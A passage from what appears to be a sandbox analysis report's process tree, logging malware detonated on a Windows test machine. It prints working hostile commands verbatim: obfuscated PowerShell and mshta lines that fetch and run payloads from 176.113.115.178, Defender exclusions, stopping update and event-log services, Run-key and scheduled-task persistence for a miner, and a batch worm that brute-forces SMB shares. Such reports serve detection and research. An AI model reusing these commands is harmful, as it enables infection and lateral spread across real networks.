C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe"4⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1544
-
-
-
C:\Users\Admin\Desktop\a\7mpPLxE.exe"C:\Users\Admin\Desktop\a\7mpPLxE.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5616 -
C:\Users\Admin\Desktop\a\7mpPLxE.exe"C:\Users\Admin\Desktop\a\7mpPLxE.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6512
-
-
-
C:\Users\Admin\Desktop\a\0fVlNye.exe"C:\Users\Admin\Desktop\a\0fVlNye.exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:672 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmd4⤵PID:9032
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5288
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:5408
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:6016
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:6916
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 294425⤵
- System Location Discovery: System Language Discovery
PID:6788
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized l5⤵
- System Location Discovery: System Language Discovery
PID:7616
-
-
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comReynolds.com l5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
PID:8204 -
C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.comC:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com6⤵
- Suspicious use of SetThreadContext
PID:4200 -
C:\Windows\explorer.exeexplorer.exe7⤵PID:4972
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2436
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:5644
-
-
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"3⤵PID:8860
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe4⤵
- System Location Discovery: System Language Discovery
PID:8248 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"4⤵PID:6516
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6384 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe5⤵PID:7832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6272
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"5⤵PID:1364
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ5⤵PID:3388
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ6⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵
- System Location Discovery: System Language Discovery
PID:8440 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:8416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0005⤵
- Power Settings
PID:7972 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 06⤵
- Power Settings
PID:5644
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 06⤵
- Power Settings
PID:3752
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0006⤵
- Power Settings
PID:6212
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0308& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
PID:5464 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
PID:4868 -
C:\Windows\SysWOW64\net.exenet view7⤵
- Discovers systems in the same network
PID:5712
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵PID:8880
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:3620
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:5276
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:3720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "6⤵PID:7092
-
C:\Windows\SysWOW64\net.exenet view \\10.127.255.2557⤵
- Discovers systems in the same network
PID:232
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:1392
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:5304
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:8800
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:7916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5236
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1680
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2748
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:8688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5132
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:8828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1960
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:1412
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:848
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:3700
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:2292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:872
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:1776
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:8432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "6⤵PID:6560
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"7⤵PID:6180
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:7076
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5944
-
-
-
-
-
C:\Users\Admin\Desktop\a\file.exe"C:\Users\Admin\Desktop\a\file.exe"3⤵PID:8724
-
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵PID:2348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:5308 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵PID:848
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update7⤵PID:3892
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3308
-
-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update8⤵
- Blocklisted process makes network request
PID:5548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X9⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\10⤵
- Command and Scripting Interpreter: PowerShell
PID:3736
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:8968 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force11⤵
- Command and Scripting Interpreter: PowerShell
PID:3016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart11⤵PID:7660
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart12⤵PID:7840
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc11⤵
- Launches sc.exe
PID:9036
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc11⤵
- Launches sc.exe
PID:9184
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv11⤵
- Launches sc.exe
PID:3488
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits11⤵
- Launches sc.exe
PID:3100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc11⤵
- Launches sc.exe
PID:1440
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 011⤵
- Power Settings
PID:8684
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 011⤵
- Power Settings
PID:4100
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 011⤵
- Power Settings
PID:3352
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 011⤵
- Power Settings
PID:4200
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe11⤵PID:2976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"11⤵
- Launches sc.exe
PID:5528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"11⤵
- Launches sc.exe
PID:6560
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog11⤵
- Launches sc.exe
PID:7676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"11⤵
- Launches sc.exe
PID:8256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:2292
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2584
-
-
-
-
C:\Users\Admin\Desktop\a\L.exe"C:\Users\Admin\Desktop\a\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6140
-
-
C:\Users\Admin\Desktop\a\ttl.exe"C:\Users\Admin\Desktop\a\ttl.exe"3⤵PID:1748
-
C:\Users\Admin\Desktop\a\ttl.exe"C:\Users\Admin\Desktop\a\ttl.exe"4⤵
- Loads dropped DLL
PID:6256
-
-
-
C:\Users\Admin\Desktop\a\caspol.exe"C:\Users\Admin\Desktop\a\caspol.exe"3⤵PID:1192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6560
-
-
C:\Users\Admin\Desktop\a\caspol.exe"C:\Users\Admin\Desktop\a\caspol.exe"4⤵PID:1872
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/8978e8d5c2cdf2620aa5541469ac7f395c566d7349f709c1d23dda48a0eda0d0/detection2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4176 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbe9f13cb8,0x7ffbe9f13cc8,0x7ffbe9f13cd83⤵PID:976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16424752521401531120,12451120236760659005,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:23⤵PID:1496
-
-
